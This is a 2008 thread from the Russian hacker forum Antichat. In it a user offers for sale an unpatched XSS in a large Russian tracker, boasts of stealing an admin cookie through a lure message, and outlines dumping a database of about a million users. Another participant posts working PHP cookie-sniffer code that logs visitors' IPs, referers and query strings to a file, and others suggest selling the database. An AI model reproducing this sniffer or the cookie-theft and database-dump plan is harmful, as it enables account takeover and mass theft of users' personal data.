ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > SЕО/Финансовые задачи/Социальные сети > Покупка, Продажа, Обмен > Разное - Покупка, продажа, обмен
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Xss в крупном Российском трекере
  #1  
Старый 17.07.2008, 15:06
geforse
Постоянный
Регистрация: 02.03.2008
Сообщений: 893
Провел на форуме:
5365841

Репутация: 712


Отправить сообщение для geforse с помощью ICQ
По умолчанию Xss в крупном Российском трекере

Пассивная XSS в крупнейшем Российском трекере (не торрентс)

За подробностями 643~770
---------------------------------------------------------------------------
Возможность слить БД (~1000000 пользователей) и получить доступ к Админ-Панели!

Последний раз редактировалось geforse; 17.07.2008 в 20:51..
 
Ответить с цитированием

  #2  
Старый 17.07.2008, 15:10
.Striker
Участник форума
Регистрация: 11.11.2007
Сообщений: 260
Провел на форуме:
2808062

Репутация: 155
По умолчанию

Возможность слить БД

как ты через xxs бд будешь сливать?)
 
Ответить с цитированием

  #3  
Старый 17.07.2008, 15:13
geforse
Постоянный
Регистрация: 02.03.2008
Сообщений: 893
Провел на форуме:
5365841

Репутация: 712


Отправить сообщение для geforse с помощью ICQ
По умолчанию

.Striker
Ну давай подумаем:

Код:
1. Получаем куки админа
2. Сразу идём в админку
3. Резервная копия БД
4. Начать копирование
Так более яснее ?
 
Ответить с цитированием

  #4  
Старый 17.07.2008, 15:14
.Striker
Участник форума
Регистрация: 11.11.2007
Сообщений: 260
Провел на форуме:
2808062

Репутация: 155
По умолчанию

ты сначала получи куки и без палева слей её если получится
а потом отпиши

если сайт крупный, то думаю тама за всем пасут
 
Ответить с цитированием

  #5  
Старый 17.07.2008, 15:18
geforse
Постоянный
Регистрация: 02.03.2008
Сообщений: 893
Провел на форуме:
5365841

Репутация: 712


Отправить сообщение для geforse с помощью ICQ
По умолчанию

Доступ в админ панель я получал.
Банальное сообщение: "У вас тут плохо сайт работает"
Куки у меня и я админ!
-------------------------------------------------------------------

Сейчас снифер античатовский прост не работает))
У кого есть альтернативный, пишите, наделаю скринов бд, сайта и админки

Цитата:
Сообщение от .Striker  
если сайт крупный, то думаю тама за всем пасут
XSS я обнаружил ~2 недели назад, ещё актуальна и закрывать повидимому не собираются

З.Ы. Плиз без флуда ( =

Последний раз редактировалось geforse; 17.07.2008 в 15:20..
 
Ответить с цитированием

  #6  
Старый 17.07.2008, 15:22
.Striker
Участник форума
Регистрация: 11.11.2007
Сообщений: 260
Провел на форуме:
2808062

Репутация: 155
По умолчанию

сниффер
<?php
$ip = getenv("REMOTE_ADDR");
$rhost = getenv("HTTP_REFERER");
$input = getenv("QUERY_STRING");
$date=(date("d.m.y"));
$time=(date("H:i"));
$fp = @fopen("snif.txt", "a");
@fputs($fp, "Дата: [ $date ] Время: [ $time ] IP: $ip Хост: $rhost Инфа $input \n");
@fclose($fp);
?>
 
Ответить с цитированием

  #7  
Старый 17.07.2008, 15:24
De-visible
Banned
Регистрация: 06.01.2008
Сообщений: 904
Провел на форуме:
4037638

Репутация: 1821


Отправить сообщение для De-visible с помощью ICQ
По умолчанию

Цитата:
Сообщение от geforse  
Доступ в админ панель я получал.
Банальное сообщение: "У вас тут плохо сайт работает"
Куки у меня и я админ!
-------------------------------------------------------------------

Сейчас снифер античатовский прост не работает))
У кого есть альтернативный, пишите, наделаю скринов бд, сайта и админки



XSS я обнаружил ~2 недели назад, ещё актуальна и закрывать повидимому не собираются

З.Ы. Плиз без флуда ( =
Чем не устроил сниффер от GreenBear?
 
Ответить с цитированием

  #8  
Старый 17.07.2008, 15:27
Kaimi
Reservists Of Antichat - Level 6
Регистрация: 23.08.2007
Сообщений: 1,237
Провел на форуме:
18127311

Репутация: 1676


Отправить сообщение для Kaimi с помощью ICQ
По умолчанию

Продавал бы тогда уж сразу бд
 
Ответить с цитированием

  #9  
Старый 17.07.2008, 15:31
geforse
Постоянный
Регистрация: 02.03.2008
Сообщений: 893
Провел на форуме:
5365841

Репутация: 712


Отправить сообщение для geforse с помощью ICQ
По умолчанию

Цитата:
Сообщение от De-visible  
Чем не устроил сниффер от GreenBear?
Я его и имел ввиду (XSS тестировалась именно на нём) {он сейчас не работает(}

Цитата:
Сообщение от Kaimi  
Продавал бы тогда уж сразу бд
Что-то не хочется мне торговать БД ( =
-----------------------------------------------

Все предложения по поводу XSS в ПМ или ICQ
 
Ответить с цитированием

  #10  
Старый 17.07.2008, 18:46
geforse
Постоянный
Регистрация: 02.03.2008
Сообщений: 893
Провел на форуме:
5365841

Репутация: 712


Отправить сообщение для geforse с помощью ICQ
По умолчанию

XSS в сообщении, выглядит так:
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
[ Обзор Уязвимостей .:Drupal :. ] Cawabunga Сценарии/CMF/СMS 7 04.02.2010 02:55
Microsoft addresses XSS in Internet Explorer Fugitif Forum for discussion of ANTICHAT 3 08.07.2008 03:47
Темная сторона Xss Constantine Авторские статьи 20 14.06.2008 16:28
Xss Расширенный межсайтовый скриптинг SNIFF Чужие Статьи 0 24.11.2005 08:08
Cross Site Scripting FAQ k00p3r Уязвимости 6 12.06.2005 16:23



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ